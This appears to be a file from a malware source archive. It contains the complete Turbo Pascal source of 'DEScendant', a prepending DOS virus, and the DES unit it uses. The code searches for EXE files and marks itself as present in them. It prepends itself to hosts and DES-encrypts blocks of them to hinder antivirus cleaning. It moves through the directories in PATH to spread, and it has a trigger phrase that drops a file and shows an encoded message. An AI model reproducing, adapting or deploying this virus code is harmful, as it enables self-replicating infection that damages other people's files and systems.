MalwareSourceCode/MSDOS/D-Index/Virus.MSDOS.Unknown.des.pas

522 lines
15 KiB
ObjectPascal
Raw Permalink Normal View History

2021-01-12 23:38:47 +00:00
{
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> Description: <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD>
<EFBFBD><EFBFBD> <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> - DEScendant - <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> A prepending virus written in borland turbo pascal 7.0, it encrypts <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> variable blocks of the host file using DES, also storing the key on <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> variable offsets, this should make it very hard for AV scanner to clean <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> this virus. It doesn't infect any "new exe" files. <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> If an infected program is called with the command line parameters <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> "Too Many Secrets" the virus would put a file called "terces.pot" which <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> stores a with DES encrypted copyright message in the current directory. <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> The virus infects only 2 files per run, after no more files are found <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> in the current directory it changes the directory through the PATH <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> variable. <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD> Credits go to the guy who wrote the DES unit :) i don't know his name. <EFBFBD><EFBFBD>
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ٰ
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-- The DESUNIT.PAS is at the bottom --
}
{$M $4000,0,0 }
{$I-}
program _DEScendant_Of_Devil_;
uses crt, dos,windos,desunit;
const
virussize=11712;
var
dirinfo:tSearchRec;
filename:string;
buffer:array[1..virussize] of char;
numread,numwritten:word;
counter:byte;
attr:word;
copywrong:string;
fcrypt: file;
i:word;
ende:boolean;
path:array[1..50] of string[64];
path_item, current_dir:word;
self:boolean;
originaldir,fullname,name:array[0..80] of char;
function findfirstfile:string;
begin
findfirst('*.exe',faArchive,dirinfo);
if doserror = 0 then
findfirstfile:=dirinfo.name
else
findfirstfile:='';
end;
function findnextfile:string;
begin
findnext(dirinfo);
if doserror = 0 then
findnextfile:=dirinfo.name
else
findnextfile:='';
end;
function infected(filename:string):boolean;
var
fyou:file;
begin
assign(fyou,filename);
reset(fyou,1);
blockread(fyou,buffer,25,numread);
close(fyou);
if numread>=25 then
begin
if (buffer[19]='i') or (buffer[25]>=#64) then
infected:=true
else
infected:=false;
end
else
infected:=true;
end;
procedure crypt(var buffer:array of char; what:boolean);
var
key,bufferin,bufferout:array[1..8] of char;
i,key_begin,cipher_begin:word;
begin
case buffer[1] of
#0..#63: begin
key_begin:=10;
cipher_begin:=1998;
end;
#64..#127: begin
key_begin:=4;
cipher_begin:=21;
end;
#128..#191: begin
key_begin:=1982;
cipher_begin:=4;
end;
#192..#255: begin
key_begin:=7;
cipher_begin:=777;
end;
end;
for i:=1 to 8 do
key[i]:=buffer[i+key_begin];
for i:=1 to 8 do
bufferin[i]:=buffer[i+cipher_begin];
des(bufferin[1],bufferout[1],key[1],what);
for i:=1 to 8 do
buffer[i+cipher_begin]:=bufferout[i];
end;
procedure infect(filename:string);
var
fyou,fwe,ftemp:file;
bytes_read:longint;
begin
assign(fwe,fullname);
if self=false then
begin
setfattr(fwe,faarchive);
reset(fwe,1);
seek(fwe,18);
buffer[1]:='i';
blockwrite(fwe,buffer,1);
self:=true;
end;
if infected(filename) = false then
begin
assign(fyou,filename);
setfattr(fyou,faarchive);
assign(ftemp,'uhczzeku.tmp');
setfattr(ftemp,faarchive);
reset(fyou,1);
reset(fwe,1);
rewrite(ftemp,1);
blockread(fwe,buffer,virussize,numread);
blockwrite(ftemp,buffer,numread,numwritten);
repeat
blockread(fyou,buffer,2048,numread);
if numread=2048 then
crypt(buffer, true);
blockwrite(ftemp,buffer,numread,numwritten);
until (numread = 0) or (numwritten <> numread);
rewrite(fyou,1);
reset(ftemp,1);
repeat
blockread(ftemp,buffer,2048,numread);
blockwrite(fyou,buffer,numread,numwritten);
until (numread = 0) or (numwritten <> numread);
close(fyou);
close(ftemp);
erase(ftemp);
inc(counter);
end;
close(fwe);
end;
procedure execute_us;
var
i:byte;
fwe,ftemp:file;
parameter:string;
begin
randomize;
filename:='';
for i:=1 to 8 do
filename:=filename+chr(random(26)+ord('a'));
filename:=filename+'.exe';
assign(fwe,fullname);
assign(ftemp,filename);
setfattr(ftemp,faarchive);
reset(fwe,1);
rewrite(ftemp,1);
seek(fwe,virussize);
repeat
blockread(fwe,buffer,2048,numread);
if numread=2048 then
crypt(buffer,false);
blockwrite(ftemp,buffer,numread,numwritten);
until (numread=0) or (numwritten<>numread);
close(fwe);
close(ftemp);
parameter:='';
if paramcount>0 then
for i:=1 to paramcount do
parameter:=parameter+' '+paramstr(i);
swapvectors;
exec(filename,parameter);
swapvectors;
setfattr(ftemp,faarchive);
erase(ftemp);
end;
procedure changedirectory;
begin
if path[current_dir+1]<>'' then
begin
inc(current_dir);
chdir(path[current_dir]);
end
else
ende:=true;
end;
procedure initpath;
var
i,j:word;
dummy:string;
begin
dummy:=getenv('path');
j:=1;
for i:=1 to length(dummy) do
begin
if dummy[i]=';' then
begin
inc(j);
path[j]:='';
end
else
path[j]:=path[j]+dummy[i];
end;
end;
begin
if (paramcount=3) and (paramstr(1)='Too') and (paramstr(2)='Many') and
(paramstr(3)='Secrets') then
begin
copywrong:=#78+#32+#185+#52+#203+#38+#250+#148+
#229+#141+#155+#90+#22+#74+#218+#121+
#172+#246+#185+#190+#175+#80+#2+#79+
#121+#214+#132+#247+#26+#196+#192+#114;
assign(fcrypt,'terces.pot');
rewrite(fcrypt,1);
blockwrite(fcrypt,copywrong[1],32,numwritten);
close(fcrypt);
clrscr;
textmode(co80);
textcolor(7);
gotoxy(33,1); writeln('QRFpraqnag Bs Qrivy,');
gotoxy(25,5); writeln('jevggra ol FCb5xl va 6443 sbe PO');
textcolor(7+blink);
gotoxy(25,12); writeln('*** EXPORT RESTRICTIONS APPLY ***');
textcolor(7);
gotoxy(28,20); writeln('uggc://jjj.pbqroernxref.bet');
halt(0);
end;
getcurdir(originaldir,0);
filename:=paramstr(0);
for i:=0 to length(filename)-1 do
name[i]:=filename[i+1];
name[i+1]:=#0;
fileexpand(fullname,name);
self:=false;
counter:=0;
ende:=false;
path_item:=0;
current_dir:=0;
initpath;
filename:=findfirstfile;
while ende=false do
begin
if counter<2 then
begin
if (filename='') and (ende=false) then
changedirectory;
if ende=false then
begin
if filename='' then
filename:=findfirstfile;
infect(filename);
filename:=findnextfile;
end;
end
else
ende:=true;
end;
setcurdir(originaldir);
execute_us;
end.
---------------------------------DESUNIT.PAS---------------------------------
unit Desunit;
interface
Procedure DES (Var Input; Var Output; Var Key; Encrypt : Boolean);
implementation
Procedure DES (Var Input; Var Output; Var Key; Encrypt : Boolean);
Const
IP : Array [1..64] Of Byte = (58,50,42,34,26,18,10,2,
60,52,44,36,28,20,12,4,
62,54,46,38,30,22,14,6,
64,56,48,40,32,24,16,8,
57,49,41,33,25,17, 9,1,
59,51,43,35,27,19,11,3,
61,53,45,37,29,21,13,5,
63,55,47,39,31,23,15,7);
InvIP : Array [1..64] Of Byte = (40, 8,48,16,56,24,64,32,
39, 7,47,15,55,23,63,31,
38, 6,46,14,54,22,62,30,
37, 5,45,13,53,21,61,29,
36, 4,44,12,52,20,60,28,
35, 3,43,11,51,19,59,27,
34, 2,42,10,50,18,58,26,
33, 1,41, 9,49,17,57,25);
E : Array [1..48] Of Byte = (32, 1, 2, 3, 4, 5,
4, 5, 6, 7, 8, 9,
8, 9,10,11,12,13,
12,13,14,15,16,17,
16,17,18,19,20,21,
20,21,22,23,24,25,
24,25,26,27,28,29,
28,29,30,31,32, 1);
P : Array [1..32] Of Byte = (16, 7,20,21,
29,12,28,17,
1,15,23,26,
5,18,31,10,
2, 8,24,14,
32,27, 3, 9,
19,13,30, 6,
22,11, 4,25);
SBoxes : Array [1..8,0..3,0..15] Of Byte =
(((14, 4,13, 1, 2,15,11, 8, 3,10, 6,12, 5, 9, 0, 7),
( 0,15, 7, 4,14, 2,13, 1,10, 6,12,11, 9, 5, 3, 8),
( 4, 1,14, 8,13, 6, 2,11,15,12, 9, 7, 3,10, 5, 0),
(15,12, 8, 2, 4, 9, 1, 7, 5,11, 3,14,10, 0, 6,13)),
((15, 1, 8,14, 6,11, 3, 4, 9, 7, 2,13,12, 0, 5,10),
( 3,13, 4, 7,15, 2, 8,14,12, 0, 1,10, 6, 9,11, 5),
( 0,14, 7,11,10, 4,13, 1, 5, 8,12, 6, 9, 3, 2,15),
(13, 8,10, 1, 3,15, 4, 2,11, 6, 7,12, 0, 5,14, 9)),
((10, 0, 9,14, 6, 3,15, 5, 1,13,12, 7,11, 4, 2, 8),
(13, 7, 0, 9, 3, 4, 6,10, 2, 8, 5,14,12,11,15, 1),
(13, 6, 4, 9, 8,15, 3, 0,11, 1, 2,12, 5,10,14, 7),
( 1,10,13, 0, 6, 9, 8, 7, 4,15,14, 3,11, 5, 2,12)),
(( 7,13,14, 3, 0, 6, 9,10, 1, 2, 8, 5,11,12, 4,15),
(13, 8,11, 5, 6,15, 0, 3, 4, 7, 2,12, 1,10,14, 9),
(10, 6, 9, 0,12,11, 7,13,15, 1, 3,14, 5, 2, 8, 4),
( 3,15, 0, 6,10, 1,13, 8, 9, 4, 5,11,12, 7, 2,14)),
(( 2,12, 4, 1, 7,10,11, 6, 8, 5, 3,15,13, 0,14, 9),
(14,11, 2,12, 4, 7,13, 1, 5, 0,15,10, 3, 9, 8, 6),
( 4, 2, 1,11,10,13, 7, 8,15, 9,12, 5, 6, 3, 0,14),
(11, 8,12, 7, 1,14, 2,13, 6,15, 0, 9,10, 4, 5, 3)),
((12, 1,10,15, 9, 2, 6, 8, 0,13, 3, 4,14, 7, 5,11),
(10,15, 4, 2, 7,12, 9, 5, 6, 1,13,14, 0,11, 3, 8),
( 9,14,15, 5, 2, 8,12, 3, 7, 0, 4,10, 1,13,11, 6),
( 4, 3, 2,12, 9, 5,15,10,11,14, 1, 7, 6, 0, 8,13)),
(( 4,11, 2,14,15, 0, 8,13, 3,12, 9, 7, 5,10, 6, 1),
(13, 0,11, 7, 4, 9, 1,10,14, 3, 5,12, 2,15, 8, 6),
( 1, 4,11,13,12, 3, 7,14,10,15, 6, 8, 0, 5, 9, 2),
( 6,11,13, 8, 1, 4,10, 7, 9, 5, 0,15,14, 2, 3,12)),
((13, 2, 8, 4, 6,15,11, 1,10, 9, 3,14, 5, 0,12, 7),
( 1,15,13, 8,10, 3, 7, 4,12, 5, 6,11, 0,14, 9, 2),
( 7,11, 4, 1, 9,12,14, 2, 0, 6,10,13,15, 3, 5, 8),
( 2, 1,14, 7, 4,10, 8,13,15,12, 9, 0, 3, 5, 6,11)));
PC_1 : Array [1..56] Of Byte = (57,49,41,33,25,17, 9,
1,58,50,42,34,26,18,
10, 2,59,51,43,35,27,
19,11, 3,60,52,44,36,
63,55,47,39,31,23,15,
7,62,54,46,38,30,22,
14, 6,61,53,45,37,29,
21,13, 5,28,20,12, 4);
PC_2 : Array [1..48] Of Byte = (14,17,11,24, 1, 5,
3,28,15, 6,21,10,
23,19,12, 4,26, 8,
16, 7,27,20,13, 2,
41,52,31,37,47,55,
30,40,51,45,33,48,
44,49,39,56,34,53,
46,42,50,36,29,32);
ShiftTable : Array [1..16] Of Byte = (1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1);
Var
InputValue : Array [1..64] Of Byte;
OutputValue : Array [1..64] Of Byte;
RoundKeys : Array [1..16,1..48] Of Byte;
L, R, FunctionResult : Array [1..32] Of Byte;
C, D : Array [1..28] Of Byte;
Function GetBit (Var Data; Index : Byte) : Byte;
Var
Bits : Array [0..7] Of Byte ABSOLUTE Data;
Begin
Dec (Index);
If Bits[Index DIV 8] And (128 SHR (Index MOD 8))>0 then GetBit:=1
Else GetBit:=0;
End;{GetBit}
Procedure SetBit (Var Data; Index, Value : Byte);
Var
Bits : Array [0..7] Of Byte ABSOLUTE Data;
Bit : Byte;
Begin
Dec (Index);
Bit:=128 SHR (Index MOD 8);
Case Value Of
0 : Bits[Index DIV 8]:=Bits[Index DIV 8] And (Not Bit);
1 : Bits[Index DIV 8]:=Bits[Index DIV 8] Or Bit;
End;
End;{SetBit}
Procedure F (Var FR, FK, Output);
Var
R : Array [1..48] Of Byte ABSOLUTE FR;
K : Array [1..48] Of Byte ABSOLUTE FK;
Temp1 : Array [1..48] Of Byte;
Temp2 : Array [1..32] Of Byte;
n, h, i, j, Row, Column : Integer;
TotalOut : Array [1..32] Of Byte ABSOLUTE Output;
Begin
For n:=1 to 48 Do Temp1[n]:=R[E[n]] Xor K[n];
For n:=1 to 8 Do Begin
i:=(n-1)*6;
j:=(n-1)*4;
Row:=Temp1[i+1]*2+Temp1[i+6];
Column:=Temp1[i+2]*8 + Temp1[i+3]*4 + Temp1[i+4]*2 + Temp1[i+5];
For h:=1 to 4 Do Begin
Case h Of
1 : Temp2[j+h]:=(SBoxes[n,Row,Column] And 8) DIV 8;
2 : Temp2[j+h]:=(SBoxes[n,Row,Column] And 4) DIV 4;
3 : Temp2[j+h]:=(SBoxes[n,Row,Column] And 2) DIV 2;
4 : Temp2[j+h]:=(SBoxes[n,Row,Column] And 1);
End;
End;
End;
For n:=1 to 32 Do TotalOut[n]:=Temp2[P[n]];
End;{F}
Procedure Shift (Var SubKeyPart);
Var
SKP : Array [1..28] Of Byte ABSOLUTE SubKeyPart;
n, b : Byte;
Begin
b:=SKP[1];
For n:=1 to 27 Do SKP[n]:=SKP[n+1];
SKP[28]:=b;
End;{Shift}
Procedure SubKey (Round : Byte; Var SubKey);
Var
SK : Array [1..48] Of Byte ABSOLUTE SubKey;
n, b : Byte;
Begin
For n:=1 to ShiftTable[Round] Do Begin
Shift (C);
Shift (D);
End;
For n:=1 to 48 Do Begin
b:=PC_2[n];
If b<=28 then SK[n]:=C[b] Else SK[n]:=D[b-28];
End;
End;{SubKey}
Var
n, i, b, Round : Byte;
Outputje : Array [1..64] Of Byte;
K : Array [1..48] Of Byte;
fi : Text;
Begin
For n:=1 to 64 Do InputValue[n]:=GetBit (Input,n);
For n:=1 to 28 Do Begin
C[n]:=GetBit(Key,PC_1[n]);
D[n]:=GetBit(Key,PC_1[n+28]);
End;
For n:=1 to 16 Do SubKey (n,RoundKeys[n]);
For n:=1 to 64 Do If n<=32 then L[n]:=InputValue[IP[n]]
Else R[n-32]:=InputValue[IP[n]];
For Round:=1 to 16 Do Begin
If Encrypt then
F (R,RoundKeys[Round],FunctionResult)
Else
F (R,RoundKeys[17-Round],FunctionResult);
For n:=1 to 32 Do FunctionResult[n]:=FunctionResult[n] Xor L[n];
L:=R;
R:=FunctionResult;
End;
For n:=1 to 64 Do Begin
b:=InvIP[n];
If b<=32 then OutputValue[n]:=R[b] Else OutputValue[n]:=L[b-32];
End;
For n:=1 to 64 Do SetBit (Output,n,OutputValue[n]);
End;
end.